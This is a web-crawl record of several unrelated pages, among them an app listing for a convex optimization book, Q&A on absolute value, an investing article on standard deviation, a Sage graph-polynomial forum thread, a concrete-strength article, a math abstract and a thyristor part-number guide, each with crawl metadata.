[ "Free book apps for Android\n\n# Learn Convex Optimization Full\n\nConvex Optimization Tutorial", null, "Learn Convex Optimization Full\n\nThis Learn Convex Optimization Full will introduce various concepts involved in non-linear optimization. Linear programming problems are very easy to solve but most of the real world applications involve non-linear boundaries. So, the scope of linear programming is very limited. Hence, it is an attempt to introduce the topics like convex functions and sets and its variants, which can be used to solve the most of the worldly problems.\n\nThis Learn Convex Optimization Full is suited for the students who are interested in solving various optimization problems. These concepts are widely used in bioengineering, electrical engineering, machine learning, statistics, economics, finance, scientific computing and computational mathematics and many more.\n\nThe prerequisites for this course is introduction to linear algebra like introduction to the concepts like matrices, eigenvectors, symmetric matrices; basic calculus and introduction to the optimization like introduction to the concepts of linear programming.", null, "", null, "", null, "Characteristics of the Learn Convex Optimization Full:\n+ Free Book Apps.\n+ Easy to use.\n+ Have a list of related applications.\n+ Easily view the history of viewed items.\n+ Easily share with friends through all social networking channels.\n+ Serving banner ads and interstitial ads.", null, "Learn Convex Optimization Full" ]
[ null, "https://3.bp.blogspot.com/-_6HSPLG-ZuY/WzeaK5GZXEI/AAAAAAAALLw/PKCmtodYov4VuSy-t_lgY8LPnLPQMsjxgCLcBGAs/s200/25.png", null, "https://4.bp.blogspot.com/-KgHesWSL-1Q/WzebSAcIsWI/AAAAAAAALL8/Rpk1pDY97vIKX0UOkVtZjCRzQduKWL4PACLcBGAs/s1600/Screenshot_2018-06-29-16-56-42-16.png", null, "https://4.bp.blogspot.com/-M-86ZcumUx8/WzebSTOEd0I/AAAAAAAALMA/sCzFm6_X4H86Fp6fOvqQqmI-h5tOG00DgCLcBGAs/s1600/Screenshot_2018-06-29-16-58-32-83.png", null, "https://4.bp.blogspot.com/-PwFcrpcG7jo/WzebSQFXT4I/AAAAAAAALME/OcYAzEH1W9oUFBF3i12Tv9R3FJF4NPhBQCLcBGAs/s1600/Screenshot_2018-06-29-16-58-47-16.png", null, "https://1.bp.blogspot.com/-7M3u1HEA1VM/WzeSnK_Y11I/AAAAAAAALJU/wkk_6gs5xu4U0eCrwNaEvbMdsMIcKsDkwCEwYBhgL/s200/0-0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88462615,"math_prob":0.88121545,"size":1563,"snap":"2019-35-2019-39","text_gpt3_token_len":289,"char_repetition_ratio":0.17447081,"word_repetition_ratio":0.01746725,"special_character_ratio":0.17978247,"punctuation_ratio":0.12156863,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98822755,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-21T00:56:17Z\",\"WARC-Record-ID\":\"<urn:uuid:c514eb42-819c-49b0-9dcb-52f0eba1a22f>\",\"Content-Length\":\"218229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2ad972e5-d3a3-4e1c-b8e0-97076b71b391>\",\"WARC-Concurrent-To\":\"<urn:uuid:9d2bb80a-75c9-4cf4-8eea-fe9c7bae9e97>\",\"WARC-IP-Address\":\"172.217.7.243\",\"WARC-Target-URI\":\"https://www.booksfree.mobi/2018/06/learn-convex-optimization-full.html\",\"WARC-Payload-Digest\":\"sha1:CRMGJBO6V3FXJXM27FJUG4V3XWP3XNSG\",\"WARC-Block-Digest\":\"sha1:GAVWAYCRRJOYNPJP76SX6DKWXYCAVQWH\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574159.19_warc_CC-MAIN-20190921001810-20190921023810-00193.warc.gz\"}"}
https://kartalozelders.com/qa/question-what-is-the-absolute-value-of-5-by-8.html
[ "", null, "# Question: What Is The Absolute Value Of 5 By 8?\n\n## How do you find the absolute value?\n\nThe symbol for absolute value is two straight lines surrounding the number or expression for which you wish to indicate absolute value.|6| = 6 means the absolute value of 6 is 6.|-6| = 6 means the absolute value of -6 is 6.|-2 – x| means the absolute value of -2 minus x.More items…•.\n\n## How do you remove absolute value?\n\nTo solve an equation containing absolute value, isolate the absolute value on one side of the equation. Then set its contents equal to both the positive and negative value of the number on the other side of the equation and solve both equations.\n\n## What is the rule of absolute value?\n\nIn mathematics, the absolute value or modulus of a real number x, denoted |x|, is the non-negative value of x without regard to its sign. Namely, |x| = x if x is positive, and |x| = −x if x is negative (in which case −x is positive), and |0| = 0.\n\n## How do you get rid of an absolute value inequality?\n\nRemove the absolute value bars by setting up a compound inequality….Step 1: Isolate the absolute value|2x – 1| – 7 ³ -3 |2x – 1| ³ 4Step 2: Is the number on the other side a negative number?No, it’s a positive number, 4. We’ll move on to step 3.2 more rows\n\n## Do all absolute value equations have two solutions?\n\nYou begin by making it into two separate equations and then solving them separately. An absolute value equation has no solution if the absolute value expression equals a negative number since an absolute value can never be negative.\n\n## What is the absolute value of a positive number?\n\nThe absolute value of a number is its value regardless of its sign. When we take the absolute value of a number, it is always either positive or zero. If the original value is already positive or zero, the absolute value is the same. If the original value is negative, we simply drop the sign.\n\n## What is the absolute value of − 5?\n\nExplanation: The absolute value of -5: |−5| is the absolute value of a negative number. To find the answer to this, you simply remove the negative sign, so the answer is 5 .\n\n## What is the absolute value of 8?\n\n1 Answer. The absolute value of 8 is 8 .\n\n## What is the absolute value of |- 9?\n\nThe absolute value of −9 is 9. The absolute value of 3 is 3. The absolute value of 0 is 0. The absolute value of −156 is 156.\n\n## How do you do absolute value problems?\n\nSOLVING EQUATIONS CONTAINING ABSOLUTE VALUE(S)Step 1: Isolate the absolute value expression.Step2: Set the quantity inside the absolute value notation equal to + and – the quantity on the other side of the equation.Step 3: Solve for the unknown in both equations.Step 4: Check your answer analytically or graphically.\n\n## What is absolute value graph?\n\nThe general form of the absolute value function is: f(x) = a|x-h|+k. When “a” is negative, the V-shape graph opens downward and the vertex is the maximum. When “a” is positive, the V-shape graph opens upward and the vertex is a minimum.\n\n## Why is absolute value important?\n\nWhen you see an absolute value in a problem or equation, it means that whatever is inside the absolute value is always positive. Absolute values are often used in problems involving distance and are sometimes used with inequalities. … That’s the important thing to keep in mind it’s just like distance away from zero." ]
[ null, "https://mc.yandex.ru/watch/69937915", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8332351,"math_prob":0.9981514,"size":3729,"snap":"2021-04-2021-17","text_gpt3_token_len":892,"char_repetition_ratio":0.30442953,"word_repetition_ratio":0.15697674,"special_character_ratio":0.2461786,"punctuation_ratio":0.1126943,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9980006,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-17T19:23:50Z\",\"WARC-Record-ID\":\"<urn:uuid:93327ddd-f8cd-4724-8628-7ae0e4c91851>\",\"Content-Length\":\"31035\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9b49f6f5-67ce-4f48-958d-b19c1cfeebc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:95d4f92c-c6cc-42d5-a4e7-f852b6605395>\",\"WARC-IP-Address\":\"45.130.40.27\",\"WARC-Target-URI\":\"https://kartalozelders.com/qa/question-what-is-the-absolute-value-of-5-by-8.html\",\"WARC-Payload-Digest\":\"sha1:QA2AW7U4674VDRJ7NM2UBAUAEYKZO7LM\",\"WARC-Block-Digest\":\"sha1:XXRI2CHVI5YVBHX5VPJ4Z7FSDSYYPR3C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703513144.48_warc_CC-MAIN-20210117174558-20210117204558-00520.warc.gz\"}"}
https://aptainvestmentgroup.com/how-to-use-standard-deviation-in-investing/
[ "", null, "# How to Use Standard Deviation in Investing\n\nWhen you are investing, you are often looking for investments with the lowest potential risk and the highest potential returns. More risk usually means a higher return; however, it can also mean bigger losses. To help minimize your risk and maximize returns, you can use standard deviation in investing: a tool that helps investors measure the historical volatility of investments. The importance of this lies in the principle that losses hurt more than gains help.\n\nLearn How to Beat the Stock Market – Watch Our Webinar\n\n## What is Standard Deviation?\n\nAs a physician, you’re likely familiar with statistical concepts like standard deviation. You may use them in academia, medicine, and finance. But did you know this term is just as important for investing?\n\nStandard deviation is a statistical model that measures market volatility and, in turn, the risk which measures how widely prices are dispersed from the average price. Standard deviation isn’t necessarily a term that professionals talk about on a regular basis like the P/E ratio, dividend yields, and expense ratios, however, it is one calculation that is used to analyze and determine the historic risk of a particular investment of your portfolio.\n\nThe greater the standard deviation, the more dispersed range of returns an investor can expect. A smaller standard deviation predicts more consistent returns. A higher standard deviation doesn’t guarantee great returns: rather, this indicates a greater risk, but greater potential returns. A smaller standard deviation is less volatile and risky but is unlikely to deliver extraordinary returns.\n\n## How Standard Deviation in Investing is Used to Determine Risk\n\nAnalyzing standard deviations helps show which investments have long-term stability. Below are two example investments:\n\nInvestment 1:\n\nAverage Rate of Return: 10%\n\nStandard Deviation: 5%\n\nInvestment 2:\n\nAverage Rate of Return: 10%\n\nStandard Deviation: 12%\n\nLet’s compare their performance:\n\nBoth investments have the same average rate of return, though with different standard deviations. Investment 2 has a higher standard deviation, which can potentially mean within one standard deviation or 67% of the time that you could earn up to 22% this year but lose 2% next year. That indicates and reflects the investment’s much higher volatility. Even though the average returns are the same, there is still a higher chance of dramatic swings in your investment. Because Investment 1 has the same average rate of return but a lower standard deviation, it is safer and has less risk.  Remember, losses hurt more than gains help, so Investment 1 returns more in the long term.\n\nLong-term investments are key to financial freedom. So, determining the standard deviation is an excellent way to calculate your future portfolio and to determine if your current investments are too risky, too conservative, or just right.", null, "The left graph is a high standard deviation, so it may reach a higher return, but because it’s riskier, it’s just as likely to result in losses. On the right is a low standard deviation—less risk of losses.\n\n## How to Calculate Standard Deviation\n\n#### Step 1: Calculate Average Returns\n\nAn investment’s standard deviation is calculated by measuring the fluctuation of the average return over a period of time.  In this example, we have used 36 months. 
To find the average, add up the 36 monthly returns and divide by 36.\n\nExample: Average Returns = (-1.31 + 4.23 + 5.32 + -1.11 +…) / 36 = 2.30\n\n#### Step 2: Determine the Square of the Difference Between the Monthly Return and the Average Return\n\nOnce you have the average return, you need to find the square difference between the actual rate of return and the average rate of return for each month.\n\nFor Example: Let’s say we take an actual rate of return from the above equation, –1.31, and make that return for January.\n\nSo, in January, it would be (-1.31 – 2.30)2 = 13.03 and February would be (4.23 – 2.30)2 = 3.72\n\nRepeat this process for all 36 months and then add them all together (13.03 + 3.72 +…) = 162\n\n#### Step 3: Divide the Results\n\nDivide the amount from step 2 by the number of data points minus one: 162 / (36 – 1) = 4.62\n\n#### Step 4: Take the Square Root\n\nThen finally take the square root of the result to find the standard deviation.\n\n√4.62 = 2.15%\n\nOne standard deviation above and below the average return means that 68% of the time, your returns are within that range.  For two standard deviations, that percentage is 95% and three standard deviations that percentage is 99.7%.\n\n## Apta Properties, Your Investment Experts\n\nLong-term investments like multifamily real estate offer many benefits, one of them being great returns while being a low standard deviation investment. Adding multifamily investing to your portfolio is one of the best ways to ensure growth—especially in times of economic turbulence. When it comes to your long-term investments, it’s important to remember they take time to grow and develop into a healthy and secure nest egg. You may not see the returns immediately, but in the long run, they are more consistent and stable than other types of investments.\n\nWhen it comes to investing in your future, Apta Properties is here to help guide you through the journey to financial freedom. If you want to learn more about different types of investments and how to live your best life through passive income, schedule a consultation with our team today!", null, "" ]
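The four steps above translate directly into code. Here is a minimal Python sketch; the monthly returns are placeholders (the article only shows the first few values), and, as in step 3, it uses the sample variance, dividing by n - 1.

```
import math

# Hypothetical monthly returns in percent; the article only shows the
# first few values (-1.31, 4.23, 5.32, -1.11, ...).
monthly_returns = [-1.31, 4.23, 5.32, -1.11]  # ... extend to all 36 months

n = len(monthly_returns)

# Step 1: average return
average = sum(monthly_returns) / n

# Step 2: squared differences from the average
squared_diffs = [(r - average) ** 2 for r in monthly_returns]

# Step 3: divide the sum by (n - 1)  -> sample variance
variance = sum(squared_diffs) / (n - 1)

# Step 4: square root -> standard deviation
std_dev = math.sqrt(variance)

print(f"average = {average:.2f}%, std dev = {std_dev:.2f}%")
```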
[ null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/02/20230222_AAP_StandardDeviationinInvesting.png", null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/02/20230222_AAP_StandardDeviationGraphic-1024x512.png", null, "https://aptainvestmentgroup.com/wp-content/uploads/2023/09/Banner3.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92149174,"math_prob":0.9429266,"size":5164,"snap":"2023-40-2023-50","text_gpt3_token_len":1092,"char_repetition_ratio":0.18100776,"word_repetition_ratio":0.011764706,"special_character_ratio":0.21882261,"punctuation_ratio":0.11507128,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97338796,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-27T21:16:17Z\",\"WARC-Record-ID\":\"<urn:uuid:4f924162-1fc7-4262-bcc2-1b5954bfdf88>\",\"Content-Length\":\"42733\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:59f1e583-9802-4595-918c-757a8d03d906>\",\"WARC-Concurrent-To\":\"<urn:uuid:58e5b4bc-7f24-4ff6-931b-be5cfda4aa37>\",\"WARC-IP-Address\":\"172.67.156.103\",\"WARC-Target-URI\":\"https://aptainvestmentgroup.com/how-to-use-standard-deviation-in-investing/\",\"WARC-Payload-Digest\":\"sha1:M2HPARXWVIQOE5HVVZR5ZBPU3OABE7JS\",\"WARC-Block-Digest\":\"sha1:XF5HVEXOQQE7YOMOO2VHXWWJULBPFSTR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510326.82_warc_CC-MAIN-20230927203115-20230927233115-00149.warc.gz\"}"}
https://ask.sagemath.org/question/66932/graph-polynomial-construction/
[ "# Graph polynomial construction\n\nI wish to construct the graph polynomial (as given here) of any given graph. To do so, I wrote the following code. But, the output was null. What needs to be modified in the following code to get the appropriate graph polynomial (the product of binomials corresponding each edge):\n\n def grappoly(G):\nR=PolynomialRing(ZZ,['x_'+str(k) for k in G.vertices()])\nR.inject_variables()\nfor i in G.vertices():\nfor j in G.vertices():\nP=1\nif set((i,j)).intersection(set(G.edges()))==(i,j):\nP=('x_'+str(i)-'x_'+str(j))*P\nreturn P\nX=graphs.CompleteBipartiteGraph(5,5)\ngrappoly(X)\n\n\nThanks beforehand.\n\nedit retag close merge delete\n\nSort by » oldest newest most voted\n\nThe code required the following modifications after which it worked smoothly:\n\ndef grappoly(G):\nR=PolynomialRing(ZZ,['x_'+str(k) for k in G.vertices()])\nR.inject_variables()\nP=1\nfor i,j in G.edges(labels=false):\nP=(R('x_'+str(i))-R('x_'+str(j)))*P\nreturn P\nX=graphs.CompleteBipartiteGraph(5,5)\ngrappoly(X)\n\nmore\n\n1\n\nf'x_{k}' looks a bit nicer than 'x_'+str(k)\n\n1\n\nUse G.edges(labels=False, sort=False) to avoid deprecation warning. You can also use for k in G instead of for k in G.vertices()." ]
http://constructioncost.co/concrete-strength-is-impacted-with-different-factors.html
[ "# How concrete strength is impacted with different factors", null, "The strength of concrete is impacted by various factors. The details are given below :-\n\nConcrete porosity: Air and water are the useful substances to fill up voids in concrete. Air voids belong to pores in concrete. When concrete is blended it contains air trapped in the mix. The vibrators are used to clear out the air at the time of pouring walls.\n\nIf the concrete is less porous, it’s strength will be increased and calculated with compressive strength. The most crucial source of porosity in concrete refers to the proportion of water to cement in the mix, called the ‘water to cement ratio’.\n\nFactors water/cement ratio: It is described as the mass of water divided by the mass of cement in a mix. As for instance, in a concrete mix if there are 400kg cement and 240litres(=240kg) of water, the water/cement ratio will be 240/400=0.6. The water cement ratio is shortened as ‘w/c ratio’ or just ‘w/c’. In mixes where the w/c is in excess of roughly 0.4, all the cement can, in theory, react with water to develop cement hydration products. If the w/c ratios are greater, it follows that the space occupied by the supplementary water over w/c=0.4 will persist as pore space filled with water, or with air when the concrete becomes dry.\n\nAs a result, when the w/c ratio become higher, the porosity of the cement paste in the concrete also upsurges. With the higher porosity, the compressive strength of the concrete will reduce.\n\nStability of aggregate: It is inevitable that when the aggregate in concrete is feeble, the concrete also becomes feeble. Rocks like chalk that contain low intrinsic strength, are not appropriate to be utilized as aggregate.\n\nAggregate-paste bond: The strength of the bond among the paste and the aggregate is vital. When no bond exists, the aggregate practically reproduces a void and the strength of concrete is decreased.\n\nCement-related parameters: Various parameters pertaining to the formation of the individual cement minerals and their ratios in the cement can impact the rate of strength growth and the final strengths gained.", null, "" ]
[ null, "http://assets.pinterest.com/images/pidgets/pinit_fg_en_rect_red_20.png", null, "http://constructioncost.co/images/img/concrete-strength.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92407364,"math_prob":0.9516316,"size":2197,"snap":"2020-10-2020-16","text_gpt3_token_len":469,"char_repetition_ratio":0.17054264,"word_repetition_ratio":0.0,"special_character_ratio":0.20710059,"punctuation_ratio":0.10697675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9660325,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-22T22:00:37Z\",\"WARC-Record-ID\":\"<urn:uuid:12d6b840-1036-4167-80e7-ad23cefbe113>\",\"Content-Length\":\"27249\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:54e3d2e3-c3e2-41d2-9f37-f945a0f86895>\",\"WARC-Concurrent-To\":\"<urn:uuid:6a46df34-a304-4d59-9583-f6b5c3c48007>\",\"WARC-IP-Address\":\"107.180.48.200\",\"WARC-Target-URI\":\"http://constructioncost.co/concrete-strength-is-impacted-with-different-factors.html\",\"WARC-Payload-Digest\":\"sha1:IFWEFZDVIUJO5GTDCPEFAUDVBH4IT3ON\",\"WARC-Block-Digest\":\"sha1:NPMUHRA26GVIYCBUZBB2F6OVZG2ZNPGV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145729.69_warc_CC-MAIN-20200222211056-20200223001056-00451.warc.gz\"}"}
https://web2.0calc.com/questions/geo-prob_8
[ "+0\n\n# geo prob\n\n0\n50\n2\n\nAngle BAC= 60 and agnle ABC = 45. Angle bisector of BAC meets BC at T.  If AT = 40, what is the area of triangle ABC?", null, "Dec 7, 2020\n\n#1\n+2\n\nAngle CAT  = 30   Angle TAB  = 30  Angle ABC  = 45   Angle ACB  = 180 - 60 - 45  = 75\n\nSo angle  ATB   = 180  - 30 - 45 =   105\n\nSo angle  ATC  =180 - 105  =  75\n\nUsing the  Law of  Sines we have  that\n\nAT / sin ABC =   AB /sin ATB\n\n40 / sin 45  = AB/ sin 105\n\nAB  =  40 sin105 / sin45  = 20 ( 1 + sqrt (3) )\n\nSince angle  ACB  = angle ATC.....then  AT =  AC = 40\n\nSo area  of ABC  =  (1/2) AC * AB  sin (CAB)   =\n\n(1/2) 40 [ 20 (1 +  sqrt (3) ) ] [ sin 60]  =\n\n20 [ 20 (1 + sqrt (3)  ] sqrt (3)  / 2  =\n\n200 ( 1 + sqrt (3) )  (sqrt (3) )  =\n\n200 ( 3 + sqrt (3) )  ≈  946.4 units^2", null, "", null, "", null, "Dec 7, 2020\n#2\n+2\n\nAngle BAC= 60 and angle ABC = 45. The angle bisector of BAC meets BC at T.  If AT = 40, what is the area of triangle ABC?\n\nCF = TF = sin(15º) * 40\n\nAF = cos(15º) * 40\n\n[ABC] = 1/2 (AF*CF + BF*AF)", null, "Dec 7, 2020" ]
[ null, "https://web2.0calc.com/api/ssl-img-proxy", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/api/ssl-img-proxy", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57778794,"math_prob":0.99975187,"size":638,"snap":"2021-04-2021-17","text_gpt3_token_len":272,"char_repetition_ratio":0.18611987,"word_repetition_ratio":0.046242774,"special_character_ratio":0.5689655,"punctuation_ratio":0.07092199,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994564,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-21T12:44:38Z\",\"WARC-Record-ID\":\"<urn:uuid:a89c11c2-345c-4591-8a82-732be9b1dc6d>\",\"Content-Length\":\"24029\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a61b7941-a07c-4696-a79e-533ca1584c34>\",\"WARC-Concurrent-To\":\"<urn:uuid:69b673c2-95cd-4aa4-8eb2-9eb441dce990>\",\"WARC-IP-Address\":\"168.119.149.252\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/geo-prob_8\",\"WARC-Payload-Digest\":\"sha1:G6KHW5RLYLN4Y2IZFXR5ENWQJEZFCKQL\",\"WARC-Block-Digest\":\"sha1:BXALMYDGGFA36QZT2KEEADM66IYGW5MM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703524743.61_warc_CC-MAIN-20210121101406-20210121131406-00675.warc.gz\"}"}
https://researchnow.flinders.edu.au/en/publications/an-invariant-for-hypersurfaces-in-prime-characteristic
[ "# An invariant for hypersurfaces in prime characteristic\n\nDavid Glynn\n\nResearch output: Contribution to journalArticlepeer-review\n\n1 Citation (Scopus)\n\n## Abstract\n\nA hypersurface of order (n + 1)(p h - 1) in projective space of dimension n of prime characteristic p has an invariant monomial. This implies that a hypersurface of order (n+1)(p h-1)-1 determines an invariant point. A hypersurface of order d < n+ 1 in a projective space of dimension n of characteristic two has an invariant set of subspaces of dimension d-1 determined by one linear condition on the Grassmann coordinates of the dual subspaces.\n\nOriginal language English 881-883 3 Siam Journal on Discrete Mathematics 26 3 https://doi.org/10.1137/110823274 Published - 2012\n\n## Keywords\n\n• Geometric code\n• Hypersurface\n• Invariant\n• Linear complex\n• Nucleus\n• Prime\n• Projective space" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71225065,"math_prob":0.40895152,"size":756,"snap":"2021-21-2021-25","text_gpt3_token_len":195,"char_repetition_ratio":0.11702128,"word_repetition_ratio":0.033613447,"special_character_ratio":0.25,"punctuation_ratio":0.024390243,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96729636,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T01:13:04Z\",\"WARC-Record-ID\":\"<urn:uuid:4abd12c4-7e9a-4a60-a26d-fb89bf066e16>\",\"Content-Length\":\"41748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1040cca7-b3ca-46dd-875b-f308eab6ffcb>\",\"WARC-Concurrent-To\":\"<urn:uuid:8601f1ea-3864-4228-96b7-8fd028b022fe>\",\"WARC-IP-Address\":\"18.139.148.124\",\"WARC-Target-URI\":\"https://researchnow.flinders.edu.au/en/publications/an-invariant-for-hypersurfaces-in-prime-characteristic\",\"WARC-Payload-Digest\":\"sha1:DJ5YTNGWBFH5SVXQCYRY44KT2CTVDCJI\",\"WARC-Block-Digest\":\"sha1:LPBQ6JLOWQLRB4YEDZPW23S3HZLHZNBT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989030.65_warc_CC-MAIN-20210510003422-20210510033422-00460.warc.gz\"}"}
http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10page/Q2006LT.html?lang=en
[ "# Q2006LT View Datasheet(PDF) - Teccor Electronics\n\nPart Name\nDescription\nMFG CO.\nQ2006LT", null, "Teccor Electronics", null, "Q2006LT Datasheet PDF : 223 Pages", null, "Description of Part Numbers\nSensitive Triac\nL 20 04 F\nDevice Type\nL = Sensitive Triac\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\nX8 = 0.8 A\nN=1A\n01 = 1 A\n04 = 4 A\n06 = 6 A\n08 = 8 A\nPackage Type\nBlank = Compak (Surface Mount)\nD = TO-252 (Surface Mount)\nE = TO-92 (Isolated)\nF = TO-202 (Non-islolated)\nL = TO-220 (Isolated)\nV = TO-251 (Non-islolated)\n5 12 X\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-202\nTO-220\nTO-92\nGate Variations\n3 = 3 mA (Q I, II, III, IV)\n5 = 5 mA (Q I, II, III, IV)\n6 = 5 mA (Q I, II, III)\n6 = 10 mA (Q IV)\n8 = 10 mA (Q I, II, III)\n8 = 20 mA (Q IV)\nQ 20 04 L T H 52 X\nDevice Type\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\n04 = 4 A\n06 = 6 A\n08 = 8 A\n10 = 10 A\n15 = 15 A\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-220\nAlternistor\nGate Variation\nT = Internal Diac Trigger\nPackage Type\nL = TO-220 (Isolated)\nTriac and Alternistor\nQ 20 04 F 3 1 X\nDevice Type\nQ = Triac or Alternistor\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\n80 = 800 V\nK0 = 1000 V\nCurrent Rating\nX8 = 0.8 A\n01 = 1 A\n04 = 4 A\n06 = 6 A\n08 = 8 A\n10 = 10 A\n12 = 12 A\n15 = 15 A\n25 = 25 A\n30 = 30 A\n35 = 35 A\n40 = 40 A\nPackage Type\nD = TO-252 (Surface Mount)\nE = TO-92 (Isolated)\nF = TO-202 (Non-isolated)\nJ = TO-218X (Isolated)\nK = TO-218 (Isolated)\nL = TO-220 (Isolated)\nN = TO-263 (Surface Mount)\nP = Fastpak (Isolated)\nR = TO-220 (Non-isolated)\nV = TO-251 (Non-isolated)\nW = TO-218X (Non-isolated)\nSpecial Options\nV = 4000 V Isolation\n(TO-220 Package Only)\nTO-202\nTO-220\nTO-92\nTO-218X\nTO-218\nGate Variation\nDH3 and VH3 = 10mA (Q I, II, III)\n3 = 10 mA (Q I, II, III)\nH3 = 20mA (Q I, II, III)\n4 = 25 mA (Q I, II, III)\nH4 = 35 mA (Q I, II, III) *\n5 = 50 mA (Q I, II, III)\nH5 = 50 mA (Q I, II, III) *\n6 = 80 mA (Q I, II, III) *\n7 = 100 mA (Q I, II, III) *\n* NOTE:\nAlternistor device; no Quadrant IV operation\nSensitive SCR\nS 20 06 F S2 21 X\nDevice Type\nS = Sensitive SCR\nSpecial Options\nV = 4000 V Isolated\n(TO-220 Package Only)\nVoltage Rating\n20 = 200 V\n40 = 400 V\n60 = 600 V\nCurrent Rating\nX8 = 0.8 A\nN=1A\n06 = 6 A\n08 = 8 A\n10 = 10 A\nTO-202\nTO-220\nGate Variations\nS1 = 50 µA\nS2 = 200 µA\nS3 = 500 µA\nPackage Type\nBlank = Compak (Surface Mount)\nD = TO-252 (Surface Mount)\nF = TO-202 (Non-islolated)\nL = TO-220 (Isolated)\nV = TO-251 (Non-islolated)\nEC 103 D\nDevice Type\nTCR = TO-92 (Isolated)\nEC = TO-92 (Isolated)\nT = TO-202 (Non-isolated)\n2N = JEDEC (Isolated)\nCurrent Rating for TCR\n22 = 1.5 A\nCurrent Rating for EC\n103 = 0.8 A\nCurrent Rating for T\n106 = 4 A (IGT = 200 µA)\n107 = 4 A (IGT = 500 µA)\nCurrent Rating for 2N\n5xxx = 0.8 A\n1 75\nTO-92\nTO-202\nGate Current (for EC series only)\nNone = 200 µA\n1 = 12 µA\n2 = 50 µA\n3 = 500 µA\nVoltage Rating for TCR\n-4 = 200 V\n-6 = 400 V\n-8 = 600 V\nVoltage Rating for EC and T\nB = 200 V\nD = 400 V\nM = 600 V\nVoltage Rating for 2N\n5064 = 200 V\n6565 = 400 V\nhttp://www.teccor.com\n+1 972-580-7777\nP-6" ]
[ null, "http://www.datasheetbank.com/logo/TECCOR.gif", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "http://html.datasheetbank.com/datasheet-html/313187/TECCOR/10/page/Q2006LT.png", null ]
